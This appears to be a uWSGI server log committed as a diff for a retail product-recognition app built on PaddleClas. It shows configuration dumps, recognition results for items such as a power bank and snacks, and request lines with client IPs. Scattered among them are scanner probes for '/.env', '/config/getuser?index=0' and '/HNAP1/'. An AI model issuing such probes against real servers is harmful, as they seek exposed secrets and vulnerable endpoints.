404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 21/22] 103.243.46.90 () {36 vars in 562 bytes} [Wed Jan 26 21:19:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 22/23] 117.50.6.160 () {30 vars in 327 bytes} [Wed Jan 26 21:31:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 23/24] 83.97.20.34 () {26 vars in 287 bytes} [Wed Jan 26 22:03:07 2022] GET / 
=> generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 24/25] 217.75.202.90 () {32 vars in 464 bytes} [Wed Jan 26 22:36:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 25/26] 162.142.125.43 () {28 vars in 311 bytes} [Wed Jan 26 22:57:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 26/27] 162.142.125.43 () {34 vars in 443 bytes} [Wed Jan 26 22:57:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 27/28] 109.106.224.168 () {32 vars in 465 bytes} [Wed Jan 26 23:06:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 28/29] 47.92.102.179 () {34 vars in 459 bytes} [Wed Jan 26 23:36:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13128|app: 0|req: 2/30] 118.193.40.46 () {30 vars in 328 bytes} [Thu Jan 27 01:00:24 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 29/31] 183.136.225.56 () {34 vars in 535 bytes} [Thu Jan 27 01:06:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 30/32] 83.97.20.34 () {30 vars in 329 bytes} [Thu Jan 27 01:44:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 31/33] 101.83.69.232 () {36 vars in 803 bytes} [Thu Jan 27 01:59:49 2022] POST /search/ => generated 20323 bytes in 10 msecs (HTTP/1.1 200) 5 headers in 160 bytes (1 switches on core 0) +[pid: 13128|app: 0|req: 3/34] 101.83.69.232 () {36 vars in 799 bytes} [Thu Jan 27 01:59:57 
2022] POST /find/ => generated 114 bytes in 15 msecs (HTTP/1.1 200) 5 headers in 158 bytes (1 switches on core 0) +2022-01-27 02:00:06 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-27 02:00:06 INFO: Global : +2022-01-27 02:00:06 INFO: batch_size : 32 +2022-01-27 02:00:06 INFO: cpu_num_threads : 1 +2022-01-27 02:00:06 INFO: enable_benchmark : True +2022-01-27 02:00:06 INFO: enable_mkldnn : True +2022-01-27 02:00:06 INFO: enable_profile : False +2022-01-27 02:00:06 INFO: gpu_mem : 8000 +2022-01-27 02:00:06 INFO: ir_optim : True +2022-01-27 02:00:06 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-27 02:00:06 INFO: use_fp16 : False +2022-01-27 02:00:06 INFO: use_gpu : False +2022-01-27 02:00:06 INFO: use_tensorrt : False +2022-01-27 02:00:06 INFO: IndexProcess : +2022-01-27 02:00:06 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-01-27 02:00:06 INFO: delimiter : +2022-01-27 02:00:06 INFO: dist_type : IP +2022-01-27 02:00:06 INFO: embedding_size : 512 +2022-01-27 02:00:06 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-01-27 02:00:06 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-27 02:00:06 INFO: index_method : HNSW32 +2022-01-27 02:00:06 INFO: index_operation : new +2022-01-27 02:00:06 INFO: RecPostProcess : None +2022-01-27 02:00:06 INFO: RecPreProcess : +2022-01-27 02:00:06 INFO: transform_ops : +2022-01-27 02:00:06 INFO: ResizeImage : +2022-01-27 02:00:06 INFO: size : 224 +2022-01-27 02:00:06 INFO: NormalizeImage : +2022-01-27 02:00:06 INFO: mean : [0.485, 0.456, 0.406] 
+2022-01-27 02:00:06 INFO: order : +2022-01-27 02:00:06 INFO: scale : 0.00392157 +2022-01-27 02:00:06 INFO: std : [0.229, 0.224, 0.225] +2022-01-27 02:00:06 INFO: ToCHWImage : None + 0%| | 0/191 [00:00 generated 34 bytes in 7590 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +req +2022-01-27 02:01:09 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-27 02:01:09 INFO: DetPostProcess : +2022-01-27 02:01:09 INFO: DetPreProcess : +2022-01-27 02:01:09 INFO: transform_ops : +2022-01-27 02:01:09 INFO: DetResize : +2022-01-27 02:01:09 INFO: interp : 2 +2022-01-27 02:01:09 INFO: keep_ratio : False +2022-01-27 02:01:09 INFO: target_size : [640, 640] +2022-01-27 02:01:09 INFO: DetNormalizeImage : +2022-01-27 02:01:09 INFO: is_scale : True +2022-01-27 02:01:09 INFO: mean : [0.485, 0.456, 0.406] +2022-01-27 02:01:09 INFO: std : [0.229, 0.224, 0.225] +2022-01-27 02:01:09 INFO: DetPermute : +2022-01-27 02:01:09 INFO: Global : +2022-01-27 02:01:09 INFO: batch_size : 1 +2022-01-27 02:01:09 INFO: cpu_num_threads : 1 +2022-01-27 02:01:09 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-27 02:01:09 INFO: enable_benchmark : True +2022-01-27 02:01:09 INFO: enable_mkldnn : True +2022-01-27 02:01:09 INFO: enable_profile : False +2022-01-27 02:01:09 INFO: gpu_mem : 8000 +2022-01-27 02:01:09 INFO: image_shape : [3, 640, 640] +2022-01-27 02:01:09 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-27 02:01:09 INFO: ir_optim : True +2022-01-27 02:01:09 INFO: labe_list : ['foreground'] +2022-01-27 02:01:09 INFO: max_det_results : 5 
+2022-01-27 02:01:09 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-27 02:01:09 INFO: rec_nms_thresold : 0.05 +2022-01-27 02:01:09 INFO: threshold : 0.2 +2022-01-27 02:01:09 INFO: use_fp16 : False +2022-01-27 02:01:09 INFO: use_gpu : False +2022-01-27 02:01:09 INFO: use_tensorrt : False +2022-01-27 02:01:09 INFO: IndexProcess : +2022-01-27 02:01:09 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-27 02:01:09 INFO: return_k : 5 +2022-01-27 02:01:09 INFO: score_thres : 0.5 +2022-01-27 02:01:09 INFO: RecPostProcess : None +2022-01-27 02:01:09 INFO: RecPreProcess : +2022-01-27 02:01:09 INFO: transform_ops : +2022-01-27 02:01:09 INFO: ResizeImage : +2022-01-27 02:01:09 INFO: size : 224 +2022-01-27 02:01:09 INFO: NormalizeImage : +2022-01-27 02:01:09 INFO: mean : [0.485, 0.456, 0.406] +2022-01-27 02:01:09 INFO: order : +2022-01-27 02:01:09 INFO: scale : 0.00392157 +2022-01-27 02:01:09 INFO: std : [0.229, 0.224, 0.225] +2022-01-27 02:01:09 INFO: ToCHWImage : None +Inference: 376.32250785827637 ms per batch image +[{'bbox': [225, 14, 448, 474], 'rec_docs': '小度充电宝', 'rec_scores': 0.7016185}] +{'bbox': [225, 14, 448, 474], 'rec_docs': '小度充电宝', 'rec_scores': 0.7016185} +234 +["{'bbox': [225, 14, 448, 474], 'rec_docs': '小度充电宝', 'rec_scores': 0.7016185}\n"] +['小度充电宝'] +['小度充电宝', '48'] +[pid: 13128|app: 0|req: 4/36] 49.79.96.123 () {34 vars in 446 bytes} [Thu Jan 27 02:01:08 2022] POST /reference_client/ => generated 126 bytes in 3050 msecs (HTTP/1.1 200) 5 headers in 158 bytes (17 switches on core 0) +2022-01-27 02:01:45 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-27 02:01:45 INFO: Global : +2022-01-27 02:01:45 INFO: batch_size : 32 +2022-01-27 02:01:45 INFO: cpu_num_threads : 1 +2022-01-27 02:01:45 INFO: enable_benchmark : True +2022-01-27 02:01:45 INFO: enable_mkldnn : True +2022-01-27 02:01:45 INFO: enable_profile : False +2022-01-27 02:01:45 INFO: gpu_mem : 8000 +2022-01-27 02:01:45 INFO: ir_optim : True +2022-01-27 02:01:45 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-27 02:01:45 INFO: use_fp16 : False +2022-01-27 02:01:45 INFO: use_gpu : False +2022-01-27 02:01:45 INFO: use_tensorrt : False +2022-01-27 02:01:45 INFO: IndexProcess : +2022-01-27 02:01:45 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-01-27 02:01:45 INFO: delimiter : +2022-01-27 02:01:45 INFO: dist_type : IP +2022-01-27 02:01:45 INFO: embedding_size : 512 +2022-01-27 02:01:45 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-01-27 02:01:45 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-27 02:01:45 INFO: index_method : HNSW32 +2022-01-27 02:01:45 INFO: index_operation : new +2022-01-27 02:01:45 INFO: RecPostProcess : None +2022-01-27 02:01:45 INFO: RecPreProcess : +2022-01-27 02:01:45 INFO: transform_ops : +2022-01-27 02:01:45 INFO: ResizeImage : +2022-01-27 02:01:45 INFO: size : 224 +2022-01-27 02:01:45 INFO: NormalizeImage : +2022-01-27 02:01:45 INFO: mean : [0.485, 0.456, 0.406] +2022-01-27 02:01:45 INFO: order : +2022-01-27 02:01:45 INFO: scale : 0.00392157 +2022-01-27 02:01:45 INFO: std : [0.229, 0.224, 0.225] +2022-01-27 02:01:45 INFO: ToCHWImage : None + 0%| | 0/192 [00:00 generated 34 bytes in 8118 msecs (HTTP/1.1 200) 5 headers in 157 bytes (110 switches on core 0) +2022-01-27 02:02:02 INFO: 
+=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-27 02:02:02 INFO: DetPostProcess : +2022-01-27 02:02:02 INFO: DetPreProcess : +2022-01-27 02:02:02 INFO: transform_ops : +2022-01-27 02:02:02 INFO: DetResize : +2022-01-27 02:02:02 INFO: interp : 2 +2022-01-27 02:02:02 INFO: keep_ratio : False +2022-01-27 02:02:02 INFO: target_size : [640, 640] +2022-01-27 02:02:02 INFO: DetNormalizeImage : +2022-01-27 02:02:02 INFO: is_scale : True +2022-01-27 02:02:02 INFO: mean : [0.485, 0.456, 0.406] +2022-01-27 02:02:02 INFO: std : [0.229, 0.224, 0.225] +2022-01-27 02:02:02 INFO: DetPermute : +2022-01-27 02:02:02 INFO: Global : +2022-01-27 02:02:02 INFO: batch_size : 1 +2022-01-27 02:02:02 INFO: cpu_num_threads : 1 +2022-01-27 02:02:02 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-27 02:02:02 INFO: enable_benchmark : True +2022-01-27 02:02:02 INFO: enable_mkldnn : True +2022-01-27 02:02:02 INFO: enable_profile : False +2022-01-27 02:02:02 INFO: gpu_mem : 8000 +2022-01-27 02:02:02 INFO: image_shape : [3, 640, 640] +2022-01-27 02:02:02 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/retail/test1.jpg +2022-01-27 02:02:02 INFO: ir_optim : True +2022-01-27 02:02:02 INFO: labe_list : ['foreground'] +2022-01-27 02:02:02 INFO: max_det_results : 5 +2022-01-27 02:02:02 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-27 02:02:02 INFO: rec_nms_thresold : 0.05 +2022-01-27 02:02:02 INFO: threshold : 0.2 +2022-01-27 02:02:02 INFO: use_fp16 : False +2022-01-27 02:02:02 INFO: use_gpu : False +2022-01-27 02:02:02 
INFO: use_tensorrt : False +2022-01-27 02:02:02 INFO: IndexProcess : +2022-01-27 02:02:02 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-27 02:02:02 INFO: return_k : 5 +2022-01-27 02:02:02 INFO: score_thres : 0.5 +2022-01-27 02:02:02 INFO: RecPostProcess : None +2022-01-27 02:02:02 INFO: RecPreProcess : +2022-01-27 02:02:02 INFO: transform_ops : +2022-01-27 02:02:02 INFO: ResizeImage : +2022-01-27 02:02:02 INFO: size : 224 +2022-01-27 02:02:02 INFO: NormalizeImage : +2022-01-27 02:02:02 INFO: mean : [0.485, 0.456, 0.406] +2022-01-27 02:02:02 INFO: order : +2022-01-27 02:02:02 INFO: scale : 0.00392157 +2022-01-27 02:02:02 INFO: std : [0.229, 0.224, 0.225] +2022-01-27 02:02:02 INFO: ToCHWImage : None +Inference: 373.77071380615234 ms per batch image +[{'bbox': [49, 267, 477, 797], 'rec_docs': '小圆饼干', 'rec_scores': 0.83315194}, {'bbox': [541, 106, 948, 842], 'rec_docs': '江小白', 'rec_scores': 0.8225656}, {'bbox': [1006, 271, 1303, 795], 'rec_docs': '修正带', 'rec_scores': 0.78487474}] +{'bbox': [49, 267, 477, 797], 'rec_docs': '小圆饼干', 'rec_scores': 0.83315194} +{'bbox': [541, 106, 948, 842], 'rec_docs': '江小白', 'rec_scores': 0.8225656} +{'bbox': [1006, 271, 1303, 795], 'rec_docs': '修正带', 'rec_scores': 0.78487474} +234 +["{'bbox': [49, 267, 477, 797], 'rec_docs': '小圆饼干', 'rec_scores': 0.83315194}\n", "{'bbox': [541, 106, 948, 842], 'rec_docs': '江小白', 'rec_scores': 0.8225656}\n", "{'bbox': [1006, 271, 1303, 795], 'rec_docs': '修正带', 'rec_scores': 0.78487474}\n"] +['小圆饼干', '江小白', '修正带'] +['小圆饼干', '7', '江小白', '20', '修正带', '6'] +[pid: 13129|app: 0|req: 34/38] 101.83.69.232 () {36 vars in 813 bytes} [Thu Jan 27 02:02:01 2022] POST /reference/ => generated 168 bytes in 3466 msecs (HTTP/1.1 200) 5 headers in 158 bytes (130 switches on core 0) +[pid: 13128|app: 0|req: 5/39] 177.223.16.60 () {32 vars in 470 bytes} [Thu Jan 27 02:03:00 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) 
+[pid: 13127|app: 0|req: 1/40] 101.83.69.232 () {36 vars in 799 bytes} [Thu Jan 27 02:07:30 2022] POST /find/ => generated 114 bytes in 241 msecs (HTTP/1.1 200) 5 headers in 158 bytes (1 switches on core 0) +2022-01-27 02:07:35 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-27 02:07:35 INFO: Global : +2022-01-27 02:07:35 INFO: batch_size : 32 +2022-01-27 02:07:35 INFO: cpu_num_threads : 1 +2022-01-27 02:07:35 INFO: enable_benchmark : True +2022-01-27 02:07:35 INFO: enable_mkldnn : True +2022-01-27 02:07:35 INFO: enable_profile : False +2022-01-27 02:07:35 INFO: gpu_mem : 8000 +2022-01-27 02:07:35 INFO: ir_optim : True +2022-01-27 02:07:35 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-27 02:07:35 INFO: use_fp16 : False +2022-01-27 02:07:35 INFO: use_gpu : False +2022-01-27 02:07:35 INFO: use_tensorrt : False +2022-01-27 02:07:35 INFO: IndexProcess : +2022-01-27 02:07:35 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-01-27 02:07:35 INFO: delimiter : +2022-01-27 02:07:35 INFO: dist_type : IP +2022-01-27 02:07:35 INFO: embedding_size : 512 +2022-01-27 02:07:35 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-01-27 02:07:35 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-27 02:07:35 INFO: index_method : HNSW32 +2022-01-27 02:07:35 INFO: index_operation : new +2022-01-27 02:07:35 INFO: RecPostProcess : None +2022-01-27 02:07:35 INFO: RecPreProcess : +2022-01-27 02:07:35 INFO: transform_ops : +2022-01-27 02:07:35 INFO: ResizeImage : +2022-01-27 02:07:35 INFO: size : 224 
+2022-01-27 02:07:35 INFO: NormalizeImage : +2022-01-27 02:07:35 INFO: mean : [0.485, 0.456, 0.406] +2022-01-27 02:07:35 INFO: order : +2022-01-27 02:07:35 INFO: scale : 0.00392157 +2022-01-27 02:07:35 INFO: std : [0.229, 0.224, 0.225] +2022-01-27 02:07:35 INFO: ToCHWImage : None + 0%| | 0/191 [00:00 generated 34 bytes in 7585 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 36/42] 192.241.214.29 () {34 vars in 394 bytes} [Thu Jan 27 03:21:10 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +req +2022-01-27 03:41:46 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-27 03:41:46 INFO: DetPostProcess : +2022-01-27 03:41:46 INFO: DetPreProcess : +2022-01-27 03:41:46 INFO: transform_ops : +2022-01-27 03:41:46 INFO: DetResize : +2022-01-27 03:41:46 INFO: interp : 2 +2022-01-27 03:41:46 INFO: keep_ratio : False +2022-01-27 03:41:46 INFO: target_size : [640, 640] +2022-01-27 03:41:46 INFO: DetNormalizeImage : +2022-01-27 03:41:46 INFO: is_scale : True +2022-01-27 03:41:46 INFO: mean : [0.485, 0.456, 0.406] +2022-01-27 03:41:46 INFO: std : [0.229, 0.224, 0.225] +2022-01-27 03:41:46 INFO: DetPermute : +2022-01-27 03:41:46 INFO: Global : +2022-01-27 03:41:46 INFO: batch_size : 1 +2022-01-27 03:41:46 INFO: cpu_num_threads : 1 +2022-01-27 03:41:46 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-27 03:41:46 INFO: enable_benchmark : True +2022-01-27 03:41:46 INFO: enable_mkldnn : True +2022-01-27 03:41:46 INFO: enable_profile : False +2022-01-27 03:41:46 INFO: gpu_mem : 8000 
+2022-01-27 03:41:46 INFO: image_shape : [3, 640, 640] +2022-01-27 03:41:46 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-27 03:41:46 INFO: ir_optim : True +2022-01-27 03:41:46 INFO: labe_list : ['foreground'] +2022-01-27 03:41:46 INFO: max_det_results : 5 +2022-01-27 03:41:46 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-27 03:41:46 INFO: rec_nms_thresold : 0.05 +2022-01-27 03:41:46 INFO: threshold : 0.2 +2022-01-27 03:41:46 INFO: use_fp16 : False +2022-01-27 03:41:46 INFO: use_gpu : False +2022-01-27 03:41:46 INFO: use_tensorrt : False +2022-01-27 03:41:46 INFO: IndexProcess : +2022-01-27 03:41:46 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-27 03:41:46 INFO: return_k : 5 +2022-01-27 03:41:46 INFO: score_thres : 0.5 +2022-01-27 03:41:46 INFO: RecPostProcess : None +2022-01-27 03:41:46 INFO: RecPreProcess : +2022-01-27 03:41:46 INFO: transform_ops : +2022-01-27 03:41:46 INFO: ResizeImage : +2022-01-27 03:41:46 INFO: size : 224 +2022-01-27 03:41:46 INFO: NormalizeImage : +2022-01-27 03:41:46 INFO: mean : [0.485, 0.456, 0.406] +2022-01-27 03:41:46 INFO: order : +2022-01-27 03:41:46 INFO: scale : 0.00392157 +2022-01-27 03:41:46 INFO: std : [0.229, 0.224, 0.225] +2022-01-27 03:41:46 INFO: ToCHWImage : None +Inference: 377.70819664001465 ms per batch image +[{'bbox': [174, 36, 384, 469], 'rec_docs': '小度充电宝', 'rec_scores': 0.71902734}] +{'bbox': [174, 36, 384, 469], 'rec_docs': '小度充电宝', 'rec_scores': 0.71902734} +234 +["{'bbox': [174, 36, 384, 469], 'rec_docs': '小度充电宝', 'rec_scores': 0.71902734}\n"] +['小度充电宝'] +['小度充电宝', '48'] +[pid: 13129|app: 0|req: 37/43] 49.79.96.123 () {34 vars in 447 bytes} [Thu Jan 27 03:41:45 2022] POST /reference_client/ => generated 126 bytes in 3078 msecs (HTTP/1.1 200) 5 headers in 158 bytes (17 switches on core 0) +[pid: 13129|app: 0|req: 38/44] 83.97.20.34 () {26 vars in 
287 bytes} [Thu Jan 27 04:21:44 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 39/45] 101.133.131.45 () {36 vars in 550 bytes} [Thu Jan 27 04:30:32 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 40/46] 71.201.187.52 () {30 vars in 436 bytes} [Thu Jan 27 05:02:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 41/47] 62.171.132.199 () {40 vars in 672 bytes} [Thu Jan 27 06:04:45 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 42/48] 103.207.42.130 () {36 vars in 590 bytes} [Thu Jan 27 06:30:47 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13128|app: 0|req: 6/49] 103.207.42.130 () {40 vars in 697 bytes} [Thu Jan 27 06:30:49 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 43/50] 74.82.47.5 () {28 vars in 304 bytes} [Thu Jan 27 06:38:23 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 44/51] 198.98.62.159 () {42 vars in 782 bytes} [Thu Jan 27 07:27:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 45/52] 203.109.44.215 () {32 vars in 464 bytes} [Thu Jan 27 07:54:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 46/53] 83.97.20.34 () {30 vars in 329 bytes} [Thu Jan 27 07:58:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 47/54] 
103.168.29.14 () {30 vars in 340 bytes} [Thu Jan 27 08:13:48 2022] HEAD / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 48/55] 103.168.29.14 () {30 vars in 339 bytes} [Thu Jan 27 08:13:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 49/56] 189.127.145.167 () {32 vars in 465 bytes} [Thu Jan 27 09:22:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 50/57] 69.162.231.221 () {36 vars in 524 bytes} [Thu Jan 27 09:24:12 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 51/58] 69.162.231.221 () {40 vars in 631 bytes} [Thu Jan 27 09:24:12 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 52/59] 107.189.28.51 () {28 vars in 310 bytes} [Thu Jan 27 10:46:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 53/60] 107.189.28.51 () {40 vars in 671 bytes} [Thu Jan 27 10:46:21 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 54/61] 161.189.192.94 () {40 vars in 725 bytes} [Thu Jan 27 11:51:28 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 55/62] 42.240.141.27 () {26 vars in 283 bytes} [Thu Jan 27 12:09:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 56/63] 128.1.248.42 () {34 vars in 486 bytes} [Thu Jan 27 13:20:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 
13129|app: 0|req: 57/64] 83.97.20.34 () {30 vars in 329 bytes} [Thu Jan 27 14:20:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 58/65] 31.7.57.130 () {40 vars in 669 bytes} [Thu Jan 27 15:34:16 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 59/66] 23.250.19.242 () {34 vars in 536 bytes} [Thu Jan 27 16:43:30 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 60/67] 23.250.19.242 () {30 vars in 359 bytes} [Thu Jan 27 16:43:32 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 61/68] 23.250.19.242 () {30 vars in 361 bytes} [Thu Jan 27 16:43:33 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 62/69] 23.250.19.242 () {30 vars in 387 bytes} [Thu Jan 27 16:43:33 2022] GET /.well-known/security.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 63/70] 23.250.19.242 () {36 vars in 514 bytes} [Thu Jan 27 16:43:36 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 64/71] 130.211.54.158 () {42 vars in 564 bytes} [Thu Jan 27 16:43:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 65/72] 83.97.20.34 () {26 vars in 287 bytes} [Thu Jan 27 16:43:41 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 66/73] 62.171.132.199 () {40 vars in 672 bytes} [Thu Jan 27 16:57:51 2022] GET /config/getuser?index=0 => 
